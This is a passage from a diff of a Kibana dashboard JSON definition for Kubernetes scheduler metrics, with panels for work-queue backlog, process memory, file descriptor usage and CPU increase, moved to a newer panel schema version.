{ - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "a2facaed-7c02-4fb6-9126-5512b8ffd26f": { - "columnOrder": [ - "73933c6b-b6da-45c6-a190-c501453f658f", - "3ed7787d-1fbe-487f-a377-9a5e5e6f2571", - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778", - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0" - ], - "columns": { - "3ed7787d-1fbe-487f-a377-9a5e5e6f2571": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "10s" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "73933c6b-b6da-45c6-a190-c501453f658f": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of kubernetes.scheduler.name + 1 other", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "dataType": "number", - "isBucketed": false, - "label": "Maximum of kubernetes.scheduler.workqueue.unfinished.sec", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.unfinished.sec" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "multi_terms" - }, - "secondaryFields": [ - "host.name" - ], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.scheduler.name" - }, - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778": { - "dataType": "number", - "isBucketed": false, - "label": "last_value(kubernetes.scheduler.workqueue.unfinished.sec)", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "s" - } - }, - "formula": "last_value(kubernetes.scheduler.workqueue.unfinished.sec)", - "isFormulaBroken": false - }, - "references": [ - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0" - ], - "scale": "ratio" - }, - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.workqueue.unfinished.sec: *" - }, - "isBucketed": false, - "label": "Part of last_value(kubernetes.scheduler.workqueue.unfinished.sec)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.workqueue.unfinished.sec" - } - }, - "incompleteColumns": {} - } - } - } + "continuity": "above", + "name": "custom", + "rangeMax": null, + "rangeMin": 0, + "rangeType": "number", + "steps": 5, + "stops": [ + { + "color": "#54B399", + "stop": 60 + }, + { + "color": "#D6BF57", + "stop": 90 + }, + { + "color": "#E7664C", + "stop": 91 + } + ] + }, + "type": "palette" + } + } + ], + "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Scheduler process data" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 18, + "i": "303702e1-ba33-49f2-b337-4cc7d7305606", + "w": 24, + "x": 24, + "y": 60 + }, + "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { + "columnOrder": [ + "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "d523e6d2-50f3-4b45-8815-8259df43850c", + "cf481e4f-b568-4306-8da9-5e3d516ccbea", + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "columns": { + "7e1756d9-af1b-4204-a8d4-8c57987216f0": { + "dataType": "string", + "isBucketed": true, + "label": "Top 3 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "695725fe-9d35-49c6-8289-21fbe54ff2a6", - "key": "kubernetes.scheduler.workqueue.unfinished.sec", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.workqueue.unfinished.sec" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "7b75d52d-c30f-4d3c-a1fc-f1a9ce764778" - ], - "layerId": "a2facaed-7c02-4fb6-9126-5512b8ffd26f", - "layerType": "data", - "palette": { - "name": "kibana_palette", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "73933c6b-b6da-45c6-a190-c501453f658f", - "xAccessor": "3ed7787d-1fbe-487f-a377-9a5e5e6f2571" - } - ], - "legend": { - "isVisible": true, - "position": "right", - "shouldTruncate": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", - "w": 24, - "x": 24, - "y": 43 - }, - "panelIndex": "6a8b9a40-11ec-4790-a38d-2d88c5468f12", - "title": "Current unfinished work", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "cf481e4f-b568-4306-8da9-5e3d516ccbea": { + "dataType": "number", + "isBucketed": false, + "label": "average(kubernetes.scheduler.process.memory.resident.bytes)", + "operationType": "formula", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + }, + "formula": "average(kubernetes.scheduler.process.memory.resident.bytes)", + "isFormulaBroken": false + }, + "references": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" + ], + "scale": "ratio" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(239,249,218,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Process", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of average(kubernetes.scheduler.process.memory.resident.bytes)", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.memory.resident.bytes" }, - "title": "", - "type": "metrics", - "uiState": {} + "d523e6d2-50f3-4b45-8815-8259df43850c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "w": 48, - "x": 0, - "y": 57 + "fillOpacity": 0.3, + "layers": [ + { + "accessors": [ + "cf481e4f-b568-4306-8da9-5e3d516ccbea" + ], + "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", + "layerType": "data", + "palette": { + "name": "temperature", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", + "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", + "yConfig": [] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": false, + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average resident memory" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "1604f0de-edd6-456e-8670-ab9b33988abb", + "w": 24, + "x": 0, + "y": 66 + }, + "panelIndex": "1604f0de-edd6-456e-8670-ab9b33988abb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "38ef18ec-512c-4c90-ad86-214a5c9bfe9d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { + "columnOrder": [ + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "301759e0-f73e-4e6d-a7c5-d0938024e989", + "301759e0-f73e-4e6d-a7c5-d0938024e989X1", + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "columns": { + "236eb2de-d45f-43f2-83f4-5a1d7355132b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Increase in Scheduler CPU", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "s" + } }, - { - "id": "metrics-*", - "name": "36494898-fe02-477e-9364-d94ea0fcb947", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { - "columnOrder": [ - "6cbab896-ee42-4dad-8831-12f53cda0d6d", - "910bd079-4852-48bd-9d7a-e5eb940f0838", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "96c80749-da61-425a-b637-878d33e410fd", - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX2", - "96c80749-da61-425a-b637-878d33e410fdX1", - "910bd079-4852-48bd-9d7a-e5eb940f0838X0" - ], - "columns": { - "6cbab896-ee42-4dad-8831-12f53cda0d6d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Resident memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(kubernetes.scheduler.process.memory.resident.bytes, kql='kubernetes.scheduler.process.memory.resident.bytes: *')", - "isFormulaBroken": false - }, - "references": [ - "910bd079-4852-48bd-9d7a-e5eb940f0838X0" - ], - "scale": "ratio" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.memory.resident.bytes: *" - }, - "isBucketed": false, - "label": "Part of Resident memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.memory.resident.bytes" - }, - "96c80749-da61-425a-b637-878d33e410fd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Open file descriptors usage", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 1 - } - }, - "formula": "last_value(kubernetes.scheduler.process.fds.open.count)/last_value(kubernetes.scheduler.process.fds.max.count)*100", - "isFormulaBroken": false - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX2" - ], - "scale": "ratio" - }, - "96c80749-da61-425a-b637-878d33e410fdX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.fds.open.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.fds.open.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.fds.max.count: *" - }, - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.fds.max.count" - }, - "96c80749-da61-425a-b637-878d33e410fdX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Open file descriptors usage", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "name": "divide", - "type": "function" - }, - 100 - ], - "location": { - "max": 114, - "min": 0 - }, - "name": "multiply", - "text": "last_value(kubernetes.scheduler.process.fds.open.count)/last_value(kubernetes.scheduler.process.fds.max.count)*100", - "type": "function" - } - }, - "references": [ - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX1" - ], - "scale": "ratio" - }, - "ee812faf-6f3c-4cc2-ad9a-27136340ef39": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.scheduler.process.memory.virtual.bytes: *" - }, - "isBucketed": false, - "label": "Virtual memory", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.memory.virtual.bytes" - } - }, - "incompleteColumns": {} - } - } - } + "formula": "counter_rate(last_value(kubernetes.scheduler.process.cpu.sec))", + "isFormulaBroken": false + }, + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X1" + ], + "scale": "ratio" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.scheduler.process.cpu.sec: *" + }, + "isBucketed": false, + "label": "Part of Increase in Scheduler CPU", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.scheduler.process.cpu.sec" + }, + "301759e0-f73e-4e6d-a7c5-d0938024e989X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Increase in Scheduler CPU", + "operationType": "counter_rate", + "references": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989X0" + ], + "scale": "ratio", + "timeScale": "s" + }, + "9edf62a7-afd2-4574-9937-34f7ee0c5fcd": { + "dataType": "string", + "isBucketed": true, + "label": "Top 20 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "36494898-fe02-477e-9364-d94ea0fcb947", - "key": "kubernetes.scheduler.process.fds.open.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "kubernetes.scheduler.process.fds.open.count" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "columns": [ - { - "alignment": "center", - "columnId": "6cbab896-ee42-4dad-8831-12f53cda0d6d" - }, - { - "alignment": "center", - "columnId": "910bd079-4852-48bd-9d7a-e5eb940f0838" - }, - { - "alignment": "center", - "columnId": "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "isTransposed": false - }, - { - "alignment": "center", - "colorMode": "text", - "columnId": "96c80749-da61-425a-b637-878d33e410fd", - "isTransposed": false, - "palette": { - "name": "custom", - "params": { - "colorStops": [ - { - "color": "#54B399", - "stop": 0 - }, - { - "color": "#D6BF57", - "stop": 60 - }, - { - "color": "#E7664C", - "stop": 90 - } - ], - "continuity": "above", - "name": "custom", - "rangeMax": null, - "rangeMin": 0, - "rangeType": "number", - "steps": 5, - "stops": [ - { - "color": "#54B399", - "stop": 60 - }, - { - "color": "#D6BF57", - "stop": 90 - }, - { - "color": "#E7664C", - "stop": 91 - } - ] - }, - "type": "palette" - } - } - ], - "layerId": "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsDatatable" + "size": 20 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "38ef18ec-512c-4c90-ad86-214a5c9bfe9d", + "key": "kubernetes.scheduler.process.cpu.sec", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "kubernetes.scheduler.process.cpu.sec" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0.3, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "hideEndzones": false, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "301759e0-f73e-4e6d-a7c5-d0938024e989" + ], + "layerId": "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", + "xAccessor": "236eb2de-d45f-43f2-83f4-5a1d7355132b", + "yConfig": [ + { + "axisMode": "left", + "color": "#d6bf57", + "forAccessor": "301759e0-f73e-4e6d-a7c5-d0938024e989" + } + ] + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "gridData": { - "h": 6, - "i": "a0716ae8-4157-473d-8eba-8ff6625fed4b", - "w": 24, - "x": 0, - "y": 60 + "preferredSeriesType": "area", + "showCurrentTimeMarker": false, + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "a0716ae8-4157-473d-8eba-8ff6625fed4b", - "title": "Scheduler process data", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "77da5988-3f03-4e8f-b1e4-39a94d8bec07": { - "columnOrder": [ - "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "d523e6d2-50f3-4b45-8815-8259df43850c", - "cf481e4f-b568-4306-8da9-5e3d516ccbea", - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "columns": { - "7e1756d9-af1b-4204-a8d4-8c57987216f0": { - "dataType": "string", - "isBucketed": true, - "label": "Top 3 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbea": { - "dataType": "number", - "isBucketed": false, - "label": "average(kubernetes.scheduler.process.memory.resident.bytes)", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - }, - "formula": "average(kubernetes.scheduler.process.memory.resident.bytes)", - "isFormulaBroken": false - }, - "references": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0" - ], - "scale": "ratio" - }, - "cf481e4f-b568-4306-8da9-5e3d516ccbeaX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of average(kubernetes.scheduler.process.memory.resident.bytes)", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.scheduler.process.memory.resident.bytes" - }, - "d523e6d2-50f3-4b45-8815-8259df43850c": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU usage increase over time" + }, + { + "version": "8.9.0", + "type": "visualization", + "gridData": { + "h": 3, + "i": "f8313a9d-ab58-448e-b183-75f914caf53f", + "w": 48, + "x": 0, + "y": 78 + }, + "panelIndex": "f8313a9d-ab58-448e-b183-75f914caf53f", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(249,235,223,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_f8313a9d-ab58-448e-b183-75f914caf53f_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "HTTP Requests", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ + { + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" + } + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" + } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" + }, + "title": "" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "668a51aa-98da-465e-9b09-d49e4f219968", + "w": 24, + "x": 0, + "y": 81 + }, + "panelIndex": "668a51aa-98da-465e-9b09-d49e4f219968", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-1048fff9-f5a4-446b-8173-e9e22d4b1cff", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f3653393-ef8e-45e9-8b91-5a0472ecf752", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "1048fff9-f5a4-446b-8173-e9e22d4b1cff": { + "columnOrder": [ + "37b94d21-2d12-4136-a81d-908d8fc7f78a", + "52732cce-1342-46e1-8273-82efeffe9aac", + "469efac9-749a-455e-9864-90dc0f5f954e", + "e014cfcb-3d50-4bbe-a6e6-4d8ea547ec4e" + ], + "columns": { + "37b94d21-2d12-4136-a81d-908d8fc7f78a": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Cluster", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0.3, - "layers": [ - { - "accessors": [ - "cf481e4f-b568-4306-8da9-5e3d516ccbea" - ], - "layerId": "77da5988-3f03-4e8f-b1e4-39a94d8bec07", - "layerType": "data", - "palette": { - "name": "temperature", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "7e1756d9-af1b-4204-a8d4-8c57987216f0", - "xAccessor": "d523e6d2-50f3-4b45-8815-8259df43850c", - "yConfig": [] - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "valuesInLegend": false, - "xTitle": "", - "yTitle": "" - } + "size": 3 + }, + "scale": "ordinal", + "sourceField": "orchestrator.cluster.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 18, - "i": "303702e1-ba33-49f2-b337-4cc7d7305606", - "w": 24, - "x": 24, - "y": 60 - }, - "panelIndex": "303702e1-ba33-49f2-b337-4cc7d7305606", - "title": "Average resident memory", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d3be0fa3-c7a4-49ba-b8cf-ab79f477f332", - "type": "index-pattern" + "469efac9-749a-455e-9864-90dc0f5f954e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "38ef18ec-512c-4c90-ad86-214a5c9bfe9d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "d3be0fa3-c7a4-49ba-b8cf-ab79f477f332": { - "columnOrder": [ - "9edf62a7-afd2-4574-9937-34f7ee0c5fcd", - "236eb2de-d45f-43f2-83f4-5a1d7355132b", - "301759e0-f73e-4e6d-a7c5-d0938024e989", - "301759e0-f73e-4e6d-a7c5-d0938024e989X1", - "301759e0-f73e-4e6d-a7c5-d0938024e989X0" - ], - "columns": { - "236eb2de-d45f-43f2-83f4-5a1d7355132b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "301759e0-f73e-4e6d-a7c5-d0938024e989": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Increase in Scheduler CPU", - 